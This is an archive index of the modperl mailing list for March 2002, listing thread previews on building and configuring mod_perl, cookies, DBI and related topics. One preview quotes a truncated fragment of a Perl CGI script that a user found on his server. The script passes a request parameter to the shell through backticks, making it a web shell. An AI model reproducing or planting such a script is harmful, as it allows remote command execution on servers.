Search Discussions
-
Hi, I am trying to install/configure mod_perl. I think it is installed but not quite sure. According to the mod_perl Reference Guide the line AddModule mod_perl.c should be added to my httpd.conf, ...
John Kolvereid
Mar 23, 2002 at 4:58 pm
Apr 4, 2002 at 2:09 am -
Fellow mod_perl hackers... It is with great pleasure that I am able to introduce you to the new mod_perl logo. So, without further ado, point your web-browsers at: ...
Jonathan M. Hollin
Mar 15, 2002 at 10:02 am
Mar 23, 2002 at 10:04 am -
I'm a heavy mod_perl user, running 3 sites as virtual servers, all with lots of custom Perl code. My httpd's are huge(~50mb), but with the help of a startup file I'm able to get them sharing most of ...
Bill Marrs
Mar 12, 2002 at 2:18 pm
Mar 17, 2002 at 6:59 pm -
Hi, a bit of history: I read on the documentation the new mod_proxy feature called ProxyIOBufferSize which allows for even better handling of lasrge mod_perl httpd's. This babby, and another little ...
Pedro Melo Cunha
Mar 24, 2002 at 1:01 am
Apr 2, 2002 at 2:26 pm -
All, I am still trying to figure out why my setup of mod_perl does not have multipart POSTs. I rebooted my machine, and found that, whereas I reported before mod_perl would try to reload the page ...
Vuillemot, Ward W
Mar 18, 2002 at 4:51 pm
Mar 21, 2002 at 9:08 pm -
I am hoping there is a someone brilliant on this list that can help me. A little while ago, I posted to clp.perl asking how I can capture the trace output from DBI into a variable. Since DBI is an ...
Mark Hazen
Mar 5, 2002 at 8:14 pm
Mar 7, 2002 at 5:10 am -
thought someone might like to have a gander at this: http://perlmonks.org/?node_id=146303 look forward to seeing your replies!!
Clayton cottingham
Mar 5, 2002 at 7:34 pm
Mar 18, 2002 at 4:44 pm -
Hi there, Please post to the list, not to an individual member, unless you are replying to a message from that member on the list - in which case you should normally cc the list. (You will find more ...
Ged Haywood
Mar 17, 2002 at 7:49 pm
Mar 18, 2002 at 5:28 pm -
I am new to perl/mod_perl and I am trying to implement secure authentication with expirable ticket/cookies on our website (Apache 1.3.9-Solaris 2.8). I am trying to use Apache::TicketAccess with ...
Ray Recendez
Mar 12, 2002 at 7:16 pm
Mar 14, 2002 at 10:49 pm -
Hello, I have run into a problem specific to Berkeley 4.0.14 that I hope you can help me to diagnose. There are enough other products involved that I'm not sure if it's DB's fault or mod_perl's. ...
Dan Wilga
Mar 21, 2002 at 5:49 pm
Apr 3, 2002 at 4:38 pm -
Hi, We have a product that at the moment uses a combination of CGI and mod_perl. While in the future it will be totally ported to mod_perl, until we figure out exactly how we'd like to overcome the ...
Marceusz
Mar 18, 2002 at 7:19 pm
Mar 26, 2002 at 4:33 am -
I'm compiling a list of companies giving mod_perl training for our new mod_perl site. Currently I have only: http://training.gbdirect.co.uk/courses/linux/customized_and_bespoke.html If you know of ...
Stas Bekman
Mar 5, 2002 at 2:10 am
Mar 25, 2002 at 9:51 am -
Hi all, I'm trying to build mod_perl 1.26 and Apache 1.3.24 on Solaris 8. I have Perl 5.6.1 on the machine. I am building mod_perl as follows: perl Makefile.PL EVERYTHING=1 \ ...
Wayne Pascoe
Mar 23, 2002 at 12:15 am
Mar 25, 2002 at 10:43 am -
I am attempting to build mod_perl on NT. I successfully built Apache. I have ActiveState 5.6 (Perl v5.6.1) installed. I also have MS Visual Studio 6.0 installed. I downloaded mod_perl-1.26.tar.gz ...
Pete Kelly
Mar 22, 2002 at 5:49 pm
Mar 25, 2002 at 11:03 pm -
I'm posting this to the modperl list as well as embperl in hope that someone there can answer some questions. I've been trying to get the latest Embperl beta working on MacOS X (although apparently ...
Kee Hinckley
Mar 22, 2002 at 4:17 pm
Mar 25, 2002 at 6:24 am -
Hi I found this script in one of my cgi-bin's. Not sure where it came from. #!/usr/bin/perl use CGI qw(:standard); print header; my $k=param("g"); my $a=param("s"); if ($a || $k) { $l=`$k 2 &1`; ...
John Michael
Mar 21, 2002 at 7:58 am
Mar 22, 2002 at 9:41 pm -
Alright, I'm a total mod_perl newbie and would like to find a host for my personal site that allows me to develop mod_perl scripts. First off, I'm assuming that there is no way to install mod_perl on ...
David Simcik
Mar 6, 2002 at 4:48 pm
Mar 10, 2002 at 9:12 pm -
hi, Is there any issue with using modperl with postgres vs mysql for a database driven website? Don't want to bark up the wrong tree in a mod_perl project only to discover I picked the wrong .db :-/ ...
Dreamwvr
Mar 21, 2002 at 6:10 pm
Mar 22, 2002 at 12:46 am -
Recently on this list the idea of 'pinning' or locking the root apache process in memory has been discussed with some interest. The reason being was that some users have experienced the situtaion ...
Daniel Hanks
Mar 22, 2002 at 6:08 pm
Mar 25, 2002 at 12:07 pm -
Hello all, I apologize if this has already been answered elsewhere, I haven't been able to find it. I am encountering a wierd problem where perl scripts running under a normal cgi-bin (ie no ...
Mike Wille
Mar 21, 2002 at 4:37 pm
Mar 22, 2002 at 8:39 pm -
It seems that my mod-perl virtual hosts are mixing content :( I don't know why ? I have virthost1 and virthost2 on mod-perl apache, most of the time you get the right content when calling respective ...
Miroslav Madzarevic
Mar 12, 2002 at 5:29 pm
Mar 14, 2002 at 6:29 pm -
Can someone forward me a URL to the perl/mod-perl success story (from about 6 months ago) that was about some people that went in and re-wrote someones web application and made it run incredably ...
Fulko Hew
Mar 6, 2002 at 5:26 pm
Mar 9, 2002 at 7:49 pm -
I'm testing the latest perl rpms from redhat updates: perl-5.6.1-26.72.3 mod_perl-1.26-2 I'm using HTML::Mason. When I start apache it just dies silently without complaining and I got nothing in the ...
Francesc Guasch Ortiz
Mar 19, 2002 at 10:11 am
Mar 21, 2002 at 4:07 am -
Hello People, Need your advise on how to cache a template under mod_perl... Any ideas? Thanks in advance -r
Rasoul Hajikhani
Mar 6, 2002 at 8:28 pm
Mar 7, 2002 at 6:26 pm -
Hi, I was all happy and rolling along when I read this in the docs. "With this limitation in mind, there are scenarios, where the usage of Apache::DBI is depreciated. Think about a heavy loaded ...
Eric Frazier
Mar 21, 2002 at 11:27 pm
Mar 27, 2002 at 4:23 am -
Hi, I've been meaning to write an article about how I used Apache/mod_perl to implement a mobile SMS application platform as it demonstrates use of Apache/mod_perl outside the Web realm, something I ...
Bas A.Schulte
Mar 20, 2002 at 11:40 pm
Mar 22, 2002 at 2:16 pm -
I am sure that this is a FAQ, but I had a very hard time finding examples of code for doing file upload. I wanted to post this here in order to have it in the permanent record so that other folks ...
Rich Bowen
Mar 12, 2002 at 11:57 am
Mar 13, 2002 at 8:23 pm -
Has anyone had any issues in getting cookies to work with IE using mod_perl? I have tried using both CGI::Cookie and Apache::Cookie, and in both instances it works just fine under Netscape, but on IE ...
Jesse and Rebecca Stay
Mar 23, 2002 at 11:48 pm
Mar 28, 2002 at 1:19 am -
WAY OFF TOPIC! When I used to login to the Unix server at university a humourous/thought-provoking/silly message was displayed (Thought for the Day?). Now that I have my Linux box up-and-running I'd ...
Jonathan M. Hollin
Mar 10, 2002 at 2:22 pm
Mar 12, 2002 at 2:15 pm -
Has anyone ran into issues with data being written to the data source using Apache::Session::Store::DB_File and Apache::Session::Lock::File? We are running into a unique instance where a value is not ...
Stathy G. Touloumis
Mar 25, 2002 at 11:42 pm
May 9, 2002 at 11:07 pm -
I have a site that does secure credit card transactions on behalf of merchants. As soon as a cardholder on the merchant site is ready to pay, the merchant redirects the cardholder to my site, and I ...
Marius Kjeldahl
Mar 15, 2002 at 11:58 am
Mar 15, 2002 at 2:34 pm -
Hi there, I've installed an apache build I did onto a Solaris 2.6 box, and when I try to start it I get the following error message: ld.so.1: /opt/apache_1.3.22/bin/httpd: fatal: libperl.so.1: open ...
J S
Mar 7, 2002 at 5:19 pm
Mar 8, 2002 at 1:20 pm -
I'm looking at how to best avoid downtime during a code upgrade, as we often do spot releases of critical code fixes and we're getting to the usage level that I don't want to interrupt service to ...
Gordon Henriksen
Mar 7, 2002 at 5:42 pm
Mar 8, 2002 at 6:15 am -
We have a full collection of wholesale freight rate calculators at http://www.apx-air-cargo.com Our new calculator is here and it will calculate rates from Asia to over 30 US cities including customs ...
Service
Mar 18, 2002 at 6:48 pm
Mar 26, 2002 at 8:09 am -
Announcing new module: PHP::Session. This module enables you to read / write (write is not yet implemented though) PHP4-builtin session files from Perl. Then you can share session data between PHP ...
Tatsuhiko Miyagawa
Mar 14, 2002 at 8:40 am
Mar 19, 2002 at 6:07 am -
I'm running a Mason based website, and I use Emacs when I write code. My web designers use Dreamweaver. I've designed the site so that my web guys have to reserve me one table cell (or more than one ...
Rob Bloodgood
Mar 14, 2002 at 7:30 pm
Mar 15, 2002 at 9:38 pm -
I got a problem im using mod_perl with a module which stores all the configurations, and embperl for displaying the wepages a sub in this .pm has to return a hash with the configurations but that ...
Fracca
Mar 14, 2002 at 6:37 pm
Mar 14, 2002 at 8:03 pm -
In the past someone posted a problem with mod_perl and DbI giving blank pages from a SQL query. I did some digging around and found some info but I need someone to fill in the holes for me a little. ...
Max Calvo
Mar 13, 2002 at 5:59 am
Mar 14, 2002 at 7:13 am -
Hello, I'm having trouble with both setting a cookie and redirecting the user to another page at the same time. It would appear the cookie is only sent when a normal header is sent by server. If I do ...
Axel Andersson
Mar 12, 2002 at 3:25 pm
Mar 13, 2002 at 9:26 am -
Dear Friends: I'm facing a dilemma here. We are testing an Oracle 9iAS installation (Apache 1.3.19, mod_ssl 2.8.1, mod_perl 1.25 as DSO, Perl 5.005_03) on Red Hat Linux 7.2, which itself came with ...
Rafael Caceres
Mar 6, 2002 at 4:17 pm
Mar 6, 2002 at 11:40 pm -
I have something like: <Location /foo SetHandler perl-script PerlHandler My::Foo </Location <Location / SetHandler perl-script PerlHandler My::Bar AuthName Bar AuthType Basic PerlAuthenHandler ...
John Siracusa
Mar 5, 2002 at 4:53 pm
Mar 5, 2002 at 6:50 pm -
Hi there- Apologies if this gets sent twice - I sent a message yesterday, but it seems to have vanished into the ether. I'd like to run the production server of my mod_perl project ...
Thomas K. Burkholder
Mar 26, 2002 at 7:16 pm
Mar 28, 2002 at 7:40 pm -
We are currently using squid set up as a reverse proxy to accelerate several heavy backends (mod_perl, etc) and to protect them from slow client connections. I am looking into replacing the squid ...
Hans Juergen von Lengerke
Mar 25, 2002 at 3:21 pm
Mar 28, 2002 at 7:39 pm -
hello, kind of a long shot but does anyone know if its possible to check a site for ssl certificate information from a mod perl handler or perl script? thanks k
Kirk Rogers
Mar 18, 2002 at 3:06 pm
Mar 18, 2002 at 3:41 pm -
Hi, I am trying to map a uri to a file based on certain factors. I would like to have this done after the 'Trans' phase when certain information is available. I noticed when the original file mapping ...
Stathy G. Touloumis
Mar 13, 2002 at 11:51 pm
Mar 14, 2002 at 8:05 pm -
Does anyone know how to set the time out value for Apache::print to a higher value if possible or how to avoid a timeout?? I am performing an import into a database that can vary in time (1min - ...
Stathy G. Touloumis
Mar 13, 2002 at 4:36 pm
Mar 13, 2002 at 5:09 pm -
Hello, I'm trying to follow the script in section 2.14 of the book "mod_perl Developer's Cookbook" in order to pre-load my Apache::registry scripts using Apache::RegistryLoader. I'm getting a seg ...
Fran Fabrizio
Mar 1, 2002 at 4:55 pm
Mar 5, 2002 at 3:11 pm -
Hi, I run a mod_perl/mysql site, which works fine most of the time. Some pages, however, come out completely blank. Reload.. and hey presto, it works. Now, I realize this could be practically ...
Axel Andersson
Mar 1, 2002 at 1:39 pm
Mar 5, 2002 at 3:46 am -
Hi all, So I went ahead and tried to install apache-ssl and am following the instructions to the T. I've acquired: mod_perl-1.26.tar.gz openssl-0.9.6c.tar.gz apache_1.3.22.tar.gz ...
Kirk Rogers
Mar 9, 2002 at 6:11 pm
Apr 2, 2002 at 10:01 pm
Group Overview
group | modperl |
categories | modperl, perl |
discussions | 187 |
posts | 937 |
users | 266 |
website | perl.apache.org |
266 users for March 2002
Archives
- October 2014 (25)
- September 2014 (48)
- August 2014 (19)
- July 2014 (12)
- June 2014 (65)
- May 2014 (35)
- April 2014 (22)
- March 2014 (17)
- February 2014 (60)
- January 2014 (14)
- December 2013 (5)
- November 2013 (27)
- October 2013 (35)
- September 2013 (13)
- August 2013 (14)
- July 2013 (18)
- June 2013 (35)
- May 2013 (50)
- April 2013 (52)
- March 2013 (36)
- February 2013 (40)
- January 2013 (17)
- December 2012 (38)
- November 2012 (72)
- October 2012 (46)
- September 2012 (39)
- August 2012 (36)
- July 2012 (49)
- June 2012 (51)
- May 2012 (38)
- April 2012 (79)
- March 2012 (68)
- February 2012 (80)
- January 2012 (98)
- December 2011 (56)
- November 2011 (59)
- October 2011 (44)
- September 2011 (25)
- August 2011 (35)
- July 2011 (159)
- June 2011 (113)
- May 2011 (113)
- April 2011 (31)
- March 2011 (75)
- February 2011 (123)
- January 2011 (80)
- December 2010 (90)
- November 2010 (55)
- October 2010 (67)
- September 2010 (82)
- August 2010 (46)
- July 2010 (31)
- June 2010 (40)
- May 2010 (84)
- April 2010 (125)
- March 2010 (99)
- February 2010 (113)
- January 2010 (145)
- December 2009 (70)
- November 2009 (110)
- October 2009 (142)
- September 2009 (235)
- August 2009 (133)
- July 2009 (85)
- June 2009 (97)
- May 2009 (72)
- April 2009 (129)
- March 2009 (220)
- February 2009 (128)
- January 2009 (221)
- December 2008 (151)
- November 2008 (160)
- October 2008 (190)
- September 2008 (134)
- August 2008 (139)
- July 2008 (127)
- June 2008 (186)
- May 2008 (196)
- April 2008 (234)
- March 2008 (175)
- February 2008 (218)
- January 2008 (179)
- December 2007 (212)
- November 2007 (275)
- October 2007 (296)
- September 2007 (262)
- August 2007 (188)
- July 2007 (250)
- June 2007 (340)
- May 2007 (343)
- April 2007 (284)
- March 2007 (340)
- February 2007 (169)
- January 2007 (351)
- December 2006 (252)
- November 2006 (314)
- October 2006 (218)
- September 2006 (302)
- August 2006 (491)
- July 2006 (192)
- June 2006 (266)
- May 2006 (291)
- April 2006 (214)
- March 2006 (346)
- February 2006 (538)
- January 2006 (348)
- December 2005 (401)
- November 2005 (340)
- October 2005 (376)
- September 2005 (491)
- August 2005 (647)
- July 2005 (414)
- June 2005 (392)
- May 2005 (609)
- April 2005 (600)
- March 2005 (429)
- February 2005 (566)
- January 2005 (522)
- December 2004 (671)
- November 2004 (561)
- October 2004 (344)
- September 2004 (407)
- August 2004 (551)
- July 2004 (480)
- June 2004 (449)
- May 2004 (482)
- April 2004 (456)
- March 2004 (643)
- February 2004 (535)
- January 2004 (496)
- December 2003 (616)
- November 2003 (728)
- October 2003 (527)
- September 2003 (437)
- August 2003 (567)
- July 2003 (807)
- June 2003 (672)
- May 2003 (664)
- April 2003 (668)
- March 2003 (551)
- February 2003 (566)
- January 2003 (637)
- December 2002 (440)
- November 2002 (652)
- October 2002 (690)
- September 2002 (410)
- August 2002 (704)
- July 2002 (650)
- June 2002 (1,057)
- May 2002 (746)
- April 2002 (943)
- March 2002 (937)
- February 2002 (757)
- January 2002 (743)
- December 2001 (705)
- November 2001 (641)
- October 2001 (718)
- September 2001 (536)
- August 2001 (895)
- July 2001 (701)
- June 2001 (649)
- May 2001 (667)
- April 2001 (678)
- March 2001 (739)
- February 2001 (796)
- January 2001 (1,075)
- December 2000 (1,399)
- November 2000 (1,093)
- October 2000 (845)
- September 2000 (963)
- August 2000 (1,128)
- July 2000 (1,254)
- June 2000 (1,251)
- May 2000 (1,363)
- April 2000 (1,381)
- March 2000 (1,361)
- February 2000 (816)